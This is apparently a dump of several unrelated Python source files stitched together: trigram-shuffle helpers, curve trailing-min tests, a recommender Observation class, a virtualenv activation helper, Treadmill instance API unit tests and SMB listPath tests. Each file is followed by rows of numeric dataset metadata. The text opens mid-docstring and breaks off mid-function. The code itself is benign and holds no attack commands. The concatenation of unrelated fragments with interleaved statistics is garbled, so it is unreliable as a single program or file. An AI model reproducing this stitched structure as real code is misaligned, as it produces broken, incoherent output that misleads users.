    remainder (one or two elements) when the length is not a multiple of three.
    """
    return [list(sentence[start:start + 3]) for start in range(0, len(sentence), 3)]
def trigram_shuffle(sentence):
    """
    Shuffle tokens *within* each trigram, keeping the trigrams themselves in
    their original order, and join the result into a single string.
    """
    chunks = get_trigrams(sentence)
    for chunk in chunks:
        random.shuffle(chunk)  # in-place, local to this trigram
    return "".join("".join(chunk) for chunk in chunks)
def shuffle_trigrams(sentence):
    """
    Shuffle whole trigrams globally while leaving each trigram's internal
    order intact, and join the result into a single string.
    """
    chunks = get_trigrams(sentence)
    random.shuffle(chunks)
    return "".join("".join(chunk) for chunk in chunks)
| 64.447368 | 206 | 0.807464 | 8,553 | 61,225 | 5.177832 | 0.034725 | 0.052703 | 0.090503 | 0.072551 | 0.903491 | 0.881159 | 0.862214 | 0.83882 | 0.81423 | 0.770537 | 0 | 0.004918 | 0.113271 | 61,225 | 949 | 207 | 64.515279 | 0.810812 | 0.058734 | 0 | 0.208745 | 0 | 0 | 0.209103 | 0.194448 | 0 | 0 | 0 | 0.001054 | 0.00141 | 1 | 0.139633 | false | 0 | 0.014104 | 0.102962 | 0.296192 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
293e6aa6f26baea48ed3b85f93c2de226fb2ef49 | 93 | py | Python | src/ctc/spec/exceptions/__init__.py | fei-protocol/checkthechain | ec838f3d0d44af228f45394d9ba8d8eb7f677520 | [
"MIT"
] | 94 | 2022-02-15T19:34:49.000Z | 2022-03-26T19:26:22.000Z | src/ctc/spec/exceptions/__init__.py | fei-protocol/checkthechain | ec838f3d0d44af228f45394d9ba8d8eb7f677520 | [
"MIT"
] | 7 | 2022-03-03T02:58:47.000Z | 2022-03-11T18:41:05.000Z | src/ctc/spec/exceptions/__init__.py | fei-protocol/checkthechain | ec838f3d0d44af228f45394d9ba8d8eb7f677520 | [
"MIT"
] | 7 | 2022-02-15T17:53:07.000Z | 2022-03-17T19:14:17.000Z | from .abi_exceptions import *
from .oracle_exceptions import *
from .rpc_exceptions import *
| 23.25 | 32 | 0.806452 | 12 | 93 | 6 | 0.5 | 0.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 93 | 3 | 33 | 31 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
294dfc41d882a8e1097497074561646d02572b04 | 2,951 | py | Python | test/accumulator_map_test.py | diatche/curvepy | 1876ad922238a8794dfeb1b1773c179081eae0dd | [
"MIT"
] | null | null | null | test/accumulator_map_test.py | diatche/curvepy | 1876ad922238a8794dfeb1b1773c179081eae0dd | [
"MIT"
] | null | null | null | test/accumulator_map_test.py | diatche/curvepy | 1876ad922238a8794dfeb1b1773c179081eae0dd | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from curvepy import Points
from . import test_util
def test_trailing_min_linear_interpolation_degree():
    """Trailing min over a 2-sample window with linear interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3])).trailing_min(2, interpolation=0)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 1), (2, 2)])
    for x, expected in [(0.5, 1), (1, 1), (1.5, 1.5), (2, 2)]:
        assert curve(x) == expected
def test_trailing_max_linear_interpolation_degree():
    """Trailing max over a 2-sample window with linear interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(2, interpolation=0)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
    for x, expected in [(0.5, 1.5), (1, 2), (2, 3), (3, 3)]:
        assert curve(x) == expected
def test_trailing_min_previous_interpolation_degree():
    """Trailing min over a 2-sample window with previous-value interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3])).trailing_min(2, interpolation=-1)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 1), (2, 2)])
    for x, expected in [(0.5, 1), (1, 1), (1.5, 1), (2, 2)]:
        assert curve(x) == expected
def test_trailing_max_previous_interpolation_degree_2():
    """Trailing max over a 2-sample window with previous-value interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(2, interpolation=-1)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
    for x, expected in [(0.5, 1), (1, 2), (1.5, 2), (2, 3), (3, 3)]:
        assert curve(x) == expected
def test_trailing_max_previous_interpolation_degree_3():
    """Trailing max over a 3-sample window with previous-value interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3, 2, 1, 1.5])).trailing_max(3, interpolation=-1)
    assert np.allclose(
        curve.sample_points(),
        [(0, 1), (1, 2), (2, 3), (3, 3), (4, 3), (5, 2)])
    for x, expected in [(0.5, 1), (1, 2), (2, 3), (3, 3), (4, 3), (4.5, 3), (5, 2)]:
        assert curve(x) == expected
def test_trailing_min_linear_interpolation_period():
    """Trailing min with the window given as a period, linear interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3])).trailing_min(1, is_period=True, interpolation=0)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 1), (2, 2)])
    for x, expected in [(0.5, 1), (1, 1), (1.5, 1.5), (2, 2)]:
        assert curve(x) == expected
def test_trailing_max_linear_interpolation_period():
    """Trailing max with the window given as a period, linear interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(1, is_period=True, interpolation=0)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
    for x, expected in [(0.5, 1.5), (1, 2), (2, 3), (3, 3)]:
        assert curve(x) == expected
def test_trailing_min_previous_interpolation_period():
    """Trailing min over a period window with previous-value interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3])).trailing_min(1, is_period=True, interpolation=-1)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 1), (2, 2)])
    for x, expected in [(0.5, 1), (1, 1), (1.5, 1), (2, 2)]:
        assert curve(x) == expected
def test_trailing_max_previous_interpolation_period():
    """Trailing max over a period window with previous-value interpolation."""
    curve = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(1, is_period=True, interpolation=-1)
    assert np.allclose(curve.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
    for x, expected in [(0.5, 1), (1, 2), (2, 3), (3, 3)]:
        assert curve(x) == expected
| 32.788889 | 99 | 0.605557 | 526 | 2,951 | 3.230038 | 0.062738 | 0.164803 | 0.065921 | 0.05827 | 0.930547 | 0.930547 | 0.909358 | 0.88817 | 0.88817 | 0.887581 | 0 | 0.094148 | 0.200949 | 2,951 | 89 | 100 | 33.157303 | 0.626378 | 0 | 0 | 0.619718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.690141 | 1 | 0.126761 | false | 0 | 0.056338 | 0 | 0.183099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
29666f23170a488fed9fa7e550ee11f1c90c34a6 | 264 | py | Python | recogym/envs/observation.py | philomenec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 413 | 2018-09-18T17:49:44.000Z | 2022-03-23T12:25:41.000Z | recogym/envs/observation.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 15 | 2018-11-08T17:04:21.000Z | 2021-11-30T19:20:27.000Z | recogym/envs/observation.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 81 | 2018-09-22T02:28:55.000Z | 2022-03-30T14:03:01.000Z | class Observation:
def __init__(self, context, sessions):
self.current_context = context
self.current_sessions = sessions
def context(self):
return self.current_context
def sessions(self):
return self.current_sessions
| 24 | 42 | 0.681818 | 29 | 264 | 5.931034 | 0.310345 | 0.255814 | 0.209302 | 0.244186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 264 | 10 | 43 | 26.4 | 0.868687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
4657afa4751e386f6c785ae5a8cfa1015f855715 | 159 | py | Python | pymetabiosis/utils.py | prabhuramachandran/pymetabiosis | 2355e5e2b5daabc96b0c5126b14387efeaa0c5d2 | [
"MIT"
] | null | null | null | pymetabiosis/utils.py | prabhuramachandran/pymetabiosis | 2355e5e2b5daabc96b0c5126b14387efeaa0c5d2 | [
"MIT"
] | null | null | null | pymetabiosis/utils.py | prabhuramachandran/pymetabiosis | 2355e5e2b5daabc96b0c5126b14387efeaa0c5d2 | [
"MIT"
] | null | null | null | from pymetabiosis import import_module
builtin = import_module("__builtin__")
def activate_virtualenv(path):
    """Run a virtualenv activation script (e.g. ``activate_this.py``).

    Executes the script through the ``__builtin__`` module's ``execfile``
    obtained via ``import_module`` above, binding ``__file__`` to *path*
    as such scripts expect.
    """
    script_globals = {"__file__" : path}
    builtin.execfile(path, script_globals)
| 22.714286 | 47 | 0.773585 | 18 | 159 | 6.222222 | 0.611111 | 0.214286 | 0.339286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119497 | 159 | 6 | 48 | 26.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.119497 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4679d9d74e5d605540851da40a7cd1fbd504990d | 17,138 | py | Python | lib/python/treadmill/tests/api/instance_test.py | vrautela/treadmill | 05e47fa8acdf8bad7af78e737efb26ea6488de82 | [
"Apache-2.0"
] | null | null | null | lib/python/treadmill/tests/api/instance_test.py | vrautela/treadmill | 05e47fa8acdf8bad7af78e737efb26ea6488de82 | [
"Apache-2.0"
] | 1 | 2017-09-18T10:36:12.000Z | 2017-09-18T10:36:12.000Z | lib/python/treadmill/tests/api/instance_test.py | evreng/treadmill | 05e47fa8acdf8bad7af78e737efb26ea6488de82 | [
"Apache-2.0"
] | null | null | null | """Instance API tests.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import mock
import jsonschema
import six
from treadmill import admin
from treadmill import exc
from treadmill import yamlwrapper as yaml
from treadmill.api import instance
from treadmill.scheduler import masterapi
def _create_apps(_zkclient, _app_id, app, _count, _created_by):
return app
class ApiInstanceTest(unittest.TestCase):
    """treadmill.api.instance tests."""

    def setUp(self):
        # Fresh API facade per test so no state leaks between cases.
        self.instance = instance.API()

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.create_apps', mock.Mock())
    @mock.patch('treadmill.api.instance._check_required_attributes',
                mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
                mock.Mock(return_value={}))
    def test_normalize_run_once(self):
        """Test missing defaults which cause the app to fail."""
        # Manifest omits restart.interval; create() must fill in the default.
        doc = """
        services:
        - command: /bin/sleep 1m
          name: sleep1m
          restart:
            limit: 0
        memory: 150M
        cpu: 10%
        disk: 100M
        """
        masterapi.create_apps.side_effect = _create_apps
        new_doc = self.instance.create('proid.app', yaml.load(doc))

        # Disable E1126: Sequence index is not an int, slice, or instance
        # pylint: disable=E1126
        self.assertEqual(new_doc['services'][0]['restart']['interval'], 60)
        self.assertTrue(masterapi.create_apps.called)

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.create_apps', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
                mock.Mock(return_value={}))
    def test_run_once_small_memory(self):
        """Testing too small memory definition for container."""
        doc = """
        services:
        - command: /bin/sleep 10
          name: sleep1m
          restart:
            limit: 0
        memory: 10M
        cpu: 10%
        disk: 100M
        """
        masterapi.create_apps.side_effect = _create_apps
        # 10M is rejected by create(); the raise proves minimum enforcement.
        with self.assertRaises(exc.TreadmillError):
            self.instance.create('proid.app', yaml.load(doc))

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.admin.Application.get',
                mock.Mock(return_value={
                    '_id': 'proid.app',
                    'tickets': ['foo@bar.baz'],
                    'cpu': '10%',
                    'memory': '100M',
                    'disk': '100M',
                    'endpoints': [{'name': 'http', 'port': 8888}],
                    'services': [{
                        'command': 'python -m SimpleHTTPServer 8888',
                        'name': 'web_server',
                        'restart': {'interval': 60, 'limit': 3}
                    }],
                    'features': [],
                    'ephemeral_ports': {},
                    'passthrough': [],
                    'args': [],
                    'environ': [],
                    'affinity_limits': {}
                }))
    @mock.patch('treadmill.scheduler.masterapi.create_apps')
    @mock.patch('treadmill.api.instance._check_required_attributes',
                mock.Mock())
    @mock.patch('treadmill.api.instance._set_defaults',
                mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
                mock.Mock(return_value={}))
    def test_instance_create_configured(self, create_apps_mock):
        """Test creating configured instance."""
        create_apps_mock.side_effect = _create_apps
        # Expected manifest passed to create_apps: the configured application
        # (Application.get above) minus the '_id' field.
        app = {
            'tickets': ['foo@bar.baz'],
            'cpu': '10%',
            'memory': '100M',
            'disk': '100M',
            'endpoints': [{'name': 'http', 'port': 8888}],
            'services': [{
                'command': 'python -m SimpleHTTPServer 8888',
                'name': 'web_server',
                'restart': {'interval': 60, 'limit': 3}
            }],
            'features': [],
            'ephemeral_ports': {},
            'passthrough': [],
            'args': [],
            'environ': [],
            'affinity_limits': {},
        }

        # Default: count=1, no created_by.
        self.instance.create('proid.app', {})
        create_apps_mock.assert_called_once_with(
            mock.ANY, 'proid.app', app, 1, None
        )

        create_apps_mock.reset_mock()
        self.instance.create('proid.app', {}, created_by='monitor')
        create_apps_mock.assert_called_once_with(
            mock.ANY, 'proid.app', app, 1, 'monitor'
        )

        create_apps_mock.reset_mock()
        self.instance.create('proid.app', {}, 2, 'foo@BAR.BAZ')
        create_apps_mock.assert_called_once_with(
            mock.ANY, 'proid.app', app, 2, 'foo@BAR.BAZ'
        )

        # Schema validation: created_by format and count range [1, 1000].
        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   'u?\'invalid!\' is not valid'):
            self.instance.create('proid.app', {}, created_by='invalid!')

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   '0 is less than the minimum of 1'):
            self.instance.create('proid.app', {}, count=0)

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   '1001 is greater than the maximum of 1000'):
            self.instance.create('proid.app', {}, count=1001)

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.delete_apps')
    def test_instance_delete(self, delete_apps_mock):
        """Test deleting an instance."""
        delete_apps_mock.return_value = None

        self.instance.delete('proid.app#0000000001')
        delete_apps_mock.assert_called_once_with(
            mock.ANY, ['proid.app#0000000001'], None
        )

        delete_apps_mock.reset_mock()
        self.instance.delete('proid.app#0000000002', deleted_by='monitor')
        delete_apps_mock.assert_called_once_with(
            mock.ANY, ['proid.app#0000000002'], 'monitor'
        )

        delete_apps_mock.reset_mock()
        self.instance.delete('proid.app#0000000003', deleted_by='foo@BAR.BAZ')
        delete_apps_mock.assert_called_once_with(
            mock.ANY, ['proid.app#0000000003'], 'foo@BAR.BAZ'
        )

        # deleted_by must pass the same identity schema as created_by.
        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   'u?\'invalid!\' is not valid'):
            self.instance.delete('proid.app#0000000001', deleted_by='invalid!')

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.admin.Application.get',
                mock.Mock(return_value={
                    '_id': 'proid.app',
                    'cpu': '10%',
                    'memory': '100M',
                    'disk': '100M',
                    'image': 'docker://foo',
                }))
    @mock.patch('treadmill.scheduler.masterapi.create_apps')
    @mock.patch('treadmill.api.instance._check_required_attributes',
                mock.Mock())
    @mock.patch('treadmill.api.instance._set_defaults', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
                mock.Mock(return_value={}))
    def test_inst_create_cfg_docker(self, create_apps_mock):
        """Test creating configured docker instance.
        """
        create_apps_mock.side_effect = _create_apps
        # Docker apps have no services list; only image + resources.
        app = {
            'cpu': '10%',
            'memory': '100M',
            'disk': '100M',
            'image': 'docker://foo',
        }

        self.instance.create('proid.app', {})
        create_apps_mock.assert_called_once_with(
            mock.ANY, 'proid.app', app, 1, None
        )

        create_apps_mock.reset_mock()
        self.instance.create('proid.app', {}, created_by='monitor')
        create_apps_mock.assert_called_once_with(
            mock.ANY, 'proid.app', app, 1, 'monitor'
        )

        create_apps_mock.reset_mock()

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   'u?\'invalid!\' is not valid'):
            self.instance.create('proid.app', {}, created_by='invalid!')

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   '0 is less than the minimum of 1'):
            self.instance.create('proid.app', {}, count=0)

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   '1001 is greater than the maximum of 1000'):
            self.instance.create('proid.app', {}, count=1001)

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.create_apps')
    @mock.patch('treadmill.api.instance._check_required_attributes',
                mock.Mock())
    @mock.patch('treadmill.api.instance._set_defaults',
                mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
                mock.Mock(return_value={}))
    def test_inst_create_eph_docker(self, create_apps_mock):
        """Test creating ephemeral docker instance.
        """
        create_apps_mock.side_effect = _create_apps
        # Manifest supplied inline (no configured Application.get mock here).
        ephemeral_app = {
            'cpu': '10%',
            'memory': '100M',
            'disk': '100M',
            'image': 'docker://foo',
        }
        # create() is expected to add the empty default collections.
        resulting_app = {
            'cpu': '10%',
            'memory': '100M',
            'disk': '100M',
            'image': 'docker://foo',
            'tickets': [],
            'endpoints': [],
            'features': [],
            'ephemeral_ports': {},
            'passthrough': [],
            'args': [],
            'environ': [],
            'affinity_limits': {},
        }

        self.instance.create('proid.app', ephemeral_app)
        create_apps_mock.assert_called_once_with(
            mock.ANY, 'proid.app', resulting_app, 1, None
        )

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   'u?\'invalid!\' is not valid'):
            self.instance.create('proid.app', {}, created_by='invalid!')

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   '0 is less than the minimum of 1'):
            self.instance.create('proid.app', {}, count=0)

        with six.assertRaisesRegex(self,
                                   jsonschema.exceptions.ValidationError,
                                   '1001 is greater than the maximum of 1000'):
            self.instance.create('proid.app', {}, count=1001)

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.delete_apps')
    def test_instance_bulk_delete(self, delete_apps_mock):
        """Test bulk deleting
        """
        delete_apps_mock.return_value = None
        self.instance.bulk_delete(
            'proid',
            ['proid.app#0000000001', 'proid.app#0000000002']
        )
        delete_apps_mock.assert_called_once_with(
            mock.ANY, ['proid.app#0000000001', 'proid.app#0000000002'], None
        )

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.update_app_priorities')
    def test_instance_bulk_update(self, update_apps_mock):
        """Test bulk updateing
        """
        update_apps_mock.return_value = None
        self.instance.bulk_update(
            'proid',
            [{'_id': 'proid.app#0000000001', 'priority': 1}]
        )
        # bulk_update translates the record list into an {instance: prio} map.
        update_apps_mock.assert_called_with(
            mock.ANY, {'proid.app#0000000001': 1}
        )

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.create_apps', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats')
    @mock.patch('treadmill.api.instance._check_required_attributes',
                mock.Mock())
    def test_quotas(self, scheduled_stats_mock):
        """Test quotas enforcement.
        """
        doc = """
        services:
        - command: /bin/sleep 10
          name: sleep1m
          restart:
            limit: 0
        memory: 100M
        cpu: 10%
        disk: 100M
        """
        # Each scenario sets the currently-scheduled stats so that the new
        # create() request would exceed quota and must be rejected.
        scheduled_stats_mock.return_value = {'xxx': 50000}
        with self.assertRaises(exc.QuotaExceededError):
            self.instance.create('yyy.app', yaml.load(doc), count=1)

        scheduled_stats_mock.return_value = {'xxx': 49900}
        with self.assertRaises(exc.QuotaExceededError):
            self.instance.create('yyy.app', yaml.load(doc), count=101)

        scheduled_stats_mock.return_value = {'yyy': 10000}
        with self.assertRaises(exc.QuotaExceededError):
            self.instance.create('yyy.app', yaml.load(doc), count=1)

        scheduled_stats_mock.return_value = {'yyy': 9900}
        with self.assertRaises(exc.QuotaExceededError):
            self.instance.create('yyy.app', yaml.load(doc), count=101)

    @mock.patch('treadmill.context.AdminContext.conn',
                mock.Mock(return_value=admin.Admin(None, None)))
    @mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
    @mock.patch('treadmill.scheduler.masterapi.create_apps')
    @mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
                mock.Mock(return_value={}))
    @mock.patch('treadmill.api.instance._check_required_attributes',
                mock.Mock())
    def test_debug_services(self, create_apps_mock):
        """Test debugging services.
        """
        doc = """
        services:
        - command: /bin/sleep 10
          name: sleep1
          restart:
            limit: 0
        - command: /bin/sleep 10
          name: sleep2
          restart:
            limit: 0
        - command: /bin/sleep 10
          name: sleep3
          restart:
            limit: 0
        memory: 100M
        cpu: 10%
        disk: 100M
        """
        # Don't debug services (no debug/debug_services).
        self.instance.create('proid.app', yaml.load(doc))
        create_apps_mock.assert_called_once()
        args, _kwargs = create_apps_mock.call_args
        _zkclient, _app_id, app, _count, _created_by = args
        # No service should be marked 'downed' in the scheduled manifest.
        self.assertEqual(
            [svc['name'] for svc in app['services'] if svc.get('downed')],
            []
        )

        create_apps_mock.reset_mock()

        # Debug all services (debug without debug_services).
        self.instance.create('proid.app', yaml.load(doc), debug=True)
        create_apps_mock.assert_called_once()
        args, _kwargs = create_apps_mock.call_args
        _zkclient, _app_id, app, _count, _created_by = args
        self.assertEqual(
            [svc['name'] for svc in app['services'] if svc.get('downed')],
            ['sleep1', 'sleep2', 'sleep3']
        )

        create_apps_mock.reset_mock()

        # Debug selected services (debug_services with a list of services).
        self.instance.create(
            'proid.app', yaml.load(doc), debug_services=['sleep1', 'sleep2']
        )
        create_apps_mock.assert_called_once()
        args, _kwargs = create_apps_mock.call_args
        _zkclient, _app_id, app, _count, _created_by = args
        self.assertEqual(
            [svc['name'] for svc in app['services'] if svc.get('downed')],
            ['sleep1', 'sleep2']
        )
# Allow running this test module directly (python instance_test.py).
if __name__ == '__main__':
    unittest.main()
| 37.419214 | 79 | 0.570487 | 1,771 | 17,138 | 5.326934 | 0.115754 | 0.05088 | 0.091584 | 0.053 | 0.848421 | 0.841743 | 0.805385 | 0.785881 | 0.757579 | 0.737333 | 0 | 0.02939 | 0.29916 | 17,138 | 457 | 80 | 37.501094 | 0.756057 | 0.04032 | 0 | 0.734417 | 0 | 0 | 0.278249 | 0.115805 | 0 | 0 | 0 | 0 | 0.092141 | 1 | 0.03252 | false | 0.00813 | 0.03523 | 0.00271 | 0.073171 | 0.00271 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
46870bba7c6a8650f3a2ea5c0c8601f744082c29 | 7,835 | py | Python | python3/tests/SMBConnectionTests/test_listpath.py | frafra/pysmb | 0b0b9a7601f8beb583c44799bc88e1a64c3440f3 | [
"Zlib"
] | 280 | 2015-01-21T14:34:41.000Z | 2022-03-02T03:36:05.000Z | python3/tests/SMBConnectionTests/test_listpath.py | frafra/pysmb | 0b0b9a7601f8beb583c44799bc88e1a64c3440f3 | [
"Zlib"
] | 160 | 2015-01-09T22:05:44.000Z | 2022-03-29T11:34:44.000Z | python3/tests/SMBConnectionTests/test_listpath.py | frafra/pysmb | 0b0b9a7601f8beb583c44799bc88e1a64c3440f3 | [
"Zlib"
] | 101 | 2015-01-17T21:12:22.000Z | 2022-01-26T11:12:16.000Z | # -*- coding: utf-8 -*-
from nose2.tools.decorators import with_setup, with_teardown
from smb.SMBConnection import SMBConnection
from smb.smb_constants import *
from smb import smb_structs
from .util import getConnectionInfo
conn = None
def setup_func_SMB1():
    """Open a module-level connection with SMB2 support turned off."""
    global conn
    smb_structs.SUPPORT_SMB2 = False
    params = getConnectionInfo()
    conn = SMBConnection(params['user'], params['password'],
                         params['client_name'], params['server_name'],
                         use_ntlm_v2 = True)
    assert conn.connect(params['server_ip'], params['server_port'])
def setup_func_SMB2():
    """Open a module-level connection with SMB2 support turned on."""
    global conn
    smb_structs.SUPPORT_SMB2 = True
    params = getConnectionInfo()
    conn = SMBConnection(params['user'], params['password'],
                         params['client_name'], params['server_name'],
                         use_ntlm_v2 = True)
    assert conn.connect(params['server_ip'], params['server_port'])
def teardown_func():
    """Close the connection opened by the setup function."""
    global conn
    conn.close()
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPath_SMB1():
    """Root listing must include known folders and files of varied name styles."""
    global conn
    results = conn.listPath('smbtest', '/')
    entries = [(r.filename, r.isDirectory) for r in results]
    expected = [
        ('\u6d4b\u8bd5\u6587\u4ef6\u5939', True),   # non-English folder name
        ('Test Folder with Long Name', True),        # long English folder name
        ('TestDir1', True),                          # short English folder name
        ('Implementing CIFS - SMB.html', False),     # long English file name
        ('rfc1001.txt', False),                      # short English file name
    ]
    for item in expected:
        assert item in entries
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listSubPath_SMB1():
    """Sub-folder listing must include its file, folder and unicode folder."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name/')
    entries = [(r.filename, r.isDirectory) for r in results]
    for item in [('Test File.txt', False), ('Test Folder', True), ('子文件夹', True)]:
        assert item in entries
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathWithManyFiles_SMB1():
    """A directory holding 999 RFC files must be listed completely."""
    global conn
    results = conn.listPath('smbtest', '/RFC Archive/')
    entries = [(r.filename, r.isDirectory) for r in results]
    assert len(entries) == 999
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPath_SMB2():
    """Root listing over SMB2 must include the same known entries as SMB1."""
    global conn
    results = conn.listPath('smbtest', '/')
    entries = [(r.filename, r.isDirectory) for r in results]
    expected = [
        ('\u6d4b\u8bd5\u6587\u4ef6\u5939', True),   # non-English folder name
        ('Test Folder with Long Name', True),        # long English folder name
        ('TestDir1', True),                          # short English folder name
        ('Implementing CIFS - SMB.html', False),     # long English file name
        ('rfc1001.txt', False),                      # short English file name
    ]
    for item in expected:
        assert item in entries
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listSubPath_SMB2():
    """Sub-folder listing over SMB2 must include file, folder, unicode folder."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name/')
